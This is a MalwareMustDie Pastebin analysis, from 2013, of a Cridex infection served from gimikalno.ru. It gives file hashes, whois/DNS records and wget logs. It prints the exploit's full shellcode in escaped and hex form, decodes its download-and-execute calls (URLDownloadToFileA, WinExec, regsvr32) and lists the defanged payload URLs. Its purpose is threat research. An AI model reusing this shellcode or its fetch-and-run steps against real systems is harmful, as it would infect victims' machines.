SHARE
TWEET

#MalwareMustDie - New Cridex Payload Mar 12 2013

MalwareMustDie Mar 11th, 2013 192 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie!
  2. #Case .ru:8080/*/column.php infection
  3. # Referer: http://pastebin.com/4WxSgjk7
  4. # Infector: gimikalno.ru  at 66.249.23.64 , 94.102.14.239, 5.9.40.136
  5. # @unixfreaxjp ~]$ date
  6. # Tue Mar 12 02:44:53 JST 2013
  7. # payload malware binary snapshots I put:
  8. http://urlquery.net/report.php?id=1373504
  9. http://urlquery.net/report.php?id=1373509
  10. http://urlquery.net/report.php?id=1373512
  11. http://urlquery.net/report.php?id=1373517
  12.  
  13. #Virus Total:
  14.  
  15. URL:    https://www.virustotal.com/en/file/b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642/analysis/1363023004/
  16. SHA256: b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642
  17. SHA1:   656ade98396bc2f671ad7344d179b791b2bece05
  18. MD5:    93a104caf7b01de69614498de5cf870a
  19. File size:      104.0 KB ( 106496 bytes )
  20. File name:      info.exe
  21. File type:      Win32 EXE
  22. Detection ratio:        2 / 45
  23. Analysis date:  2013-03-11 17:30:04 UTC ( 0 minutes ago )
  24.  
  25.  
  26. // DNS
  27.  
  28. gimikalno・ru
  29.         origin = ns1・gimikalno・ru
  30.         mail addr = root・gimikalno・ru
  31.         serial = 2012010101
  32.         refresh = 604800
  33.         retry = 1800
  34.         expire = 1800
  35.         minimum = 60
  36.  
  37. domain:        GIMIKALNO・RU
  38. nserver:       ns1・gimikalno・ru・ 41・168・5・140
  39. nserver:       ns2・gimikalno・ru・ 110・164・58・250
  40. nserver:       ns3・gimikalno・ru・ 210・71・250・131
  41. nserver:       ns4・gimikalno・ru・ 194・249・217・8
  42. nserver:       ns5・gimikalno・ru・ 72・251・206・90
  43. state:         REGISTERED, DELEGATED, UNVERIFIED
  44. person:        Private Person
  45. registrar:     NAUNET-REG-RIPN
  46. admin-contact: https://client・naunet・ru/c/whoiscontact
  47. created:       2013・03・03
  48. paid-till:     2014・03・03
  49. free-date:     2014・04・03
  50. source:        TCI
  51. Last updated on 2013・03・11 20:56:36 MSK
  52.  
  53. // landing page:
  54.  
  55. --2013-03-12 02:16:24--  h00p://gimikalno・ru:8080/forum/links/column・php
  56. Resolving gimikalno・ru・・・ seconds 0・00, 5・9・40・136, 66・249・23・64, 94・102・14・239
  57. Caching gimikalno・ru => 5・9・40・136 66・249・23・64 94・102・14・239
  58. Connecting to gimikalno・ru|5・9・40・136|:8080・・・ seconds 0・00, connected・
  59.   :
  60. GET /forum/links/column・php HTTP/1・0
  61. Referer: http://malwaremustdie・org-you-stupid-moronz
  62. Host: gimikalno・ru:8080
  63. HTTP request sent, awaiting response・・・
  64.   :
  65. HTTP/1・1 200 OK
  66. Server: nginx/1・0・10
  67. Date: Mon, 11 Mar 2013 17:15:23 GMT
  68. Content-Type: text/html; charset=CP-1251
  69. Connection: close
  70. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  71. Vary: Accept-Encoding
  72. 200 OK
  73. Length: unspecified [text/html]
  74. Saving to: `column・php'
  75. 2013-03-12 02:16:29 (50・1 KB/s) - `column・php' saved [156642]
  76.  
  77. // shellcode:
  78.  
  79. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ce9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u414f%u4145%u4943%u4644%u0647%u5d5a%u1012%u1018%u0718%u474e%u5d5a%u0745%u4144%u4346%u075b%u474b%u5d44%u4645%u5806%u5840%u4017%u154e%u5f1a%u1912%u1244%u4419%u1a12%u125e%u4e19%u510e%u154d%u5e1a%u1912%u1243%u4519%u1b12%u121a%u1b1b%u1912%u1243%u4319%u1b12%u1219%u4219%u1912%u0e47%u155b%u4319%u5c0e%u154c%u0e5a%u4250%u4e15%u2828
  80.  
  81. 41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81
  82. e9 0c fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff
  83. ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3
  84. 58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04
  85. a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3
  86. af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3
  87. 5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4
  88. 85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b
  89. f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3
  90. 24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3
  91. 2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b
  92. 5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7
  93. d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28
  94. 28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d
  95. d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab
  96. ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c
  97. 29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c
  98. 0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40
  99. d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28
  100. 5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21
  101. 28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28
  102. 7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e
  103. 2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3
  104. 3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42
  105. d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2
  106. 26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07
  107. 58 40 5c 5c 58 12 07 07  4f 41 45 41 43 49 44 46
  108. 47 06 5a 5d 12 10 18 10  18 07 4e 47 5a 5d 45 07
  109. 44 41 46 43 5b 07 4b 47  44 5d 45 46 06 58 40 58
  110. 17 40 4e 15 1a 5f 12 19  44 12 19 44 12 1a 5e 12
  111. 19 4e 0e 51 4d 15 1a 5e  12 19 43 12 19 45 12 1b
  112. 1a 12 1b 1b 12 19 43 12  19 43 12 1b 19 12 19 42
  113. 12 19 47 0e 5b 15 19 43  0e 5c 4c 15 5a 0e 50 42
  114. 15 4e 28 28
  115.  
  116. // shellcode translate・・・
  117.  
  118. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  119. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  120. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  121. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  122. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  123. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  124. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  125.  
  126. // cracked payload download urls:
  127.  
  128. h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f,
  129. h00p://66・249・23・64:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
  130. h00p://94・102・14・239:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
  131. h00p://5・9・40・136:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
  132.  
  133. // payload download log:
  134.  
  135. --2013-03-12 02:24:28--  h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
  136. Resolving gimikalno・ru・・・ seconds 0・00, 94・102・14・239, 5・9・40・136, 66・249・23・64
  137. Caching gimikalno・ru => 94・102・14・239 5・9・40・136 66・249・23・64
  138. Connecting to gimikalno・ru|94・102・14・239|:8080・・・ seconds 0・00, connected・
  139.   :
  140. GET /forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f HTTP/1・0
  141. Host: gimikalno・ru:8080
  142. HTTP request sent, awaiting response・・・
  143.   :
  144. HTTP/1・1 200 OK
  145. Server: nginx/1・0・10
  146. Date: Mon, 11 Mar 2013 17:28:36 GMT
  147. Content-Type: application/x-msdownload
  148. Connection: keep-alive
  149. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  150. Pragma: public
  151. Expires: Mon, 11 Mar 2013 17:24:21 GMT
  152. Cache-Control: must-revalidate, post-check=0, pre-check=0
  153. Cache-Control: private
  154. Content-Disposition: attachment; filename="info・exe"
  155. Content-Transfer-Encoding: binary
  156. Content-Length: 106496
  157.   :
  158. 200 OK
  159. Registered socket 1892 for persistent reuse・
  160. Length: 106496 (104K) [application/x-msdownload]
  161. Saving to: `info・exe'
  162. 2013-03-12 02:24:31 (56・1 KB/s) - `info・exe' saved [106496/106496]
  163.  
  164. ---
  165. #MalwareMustDie! @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top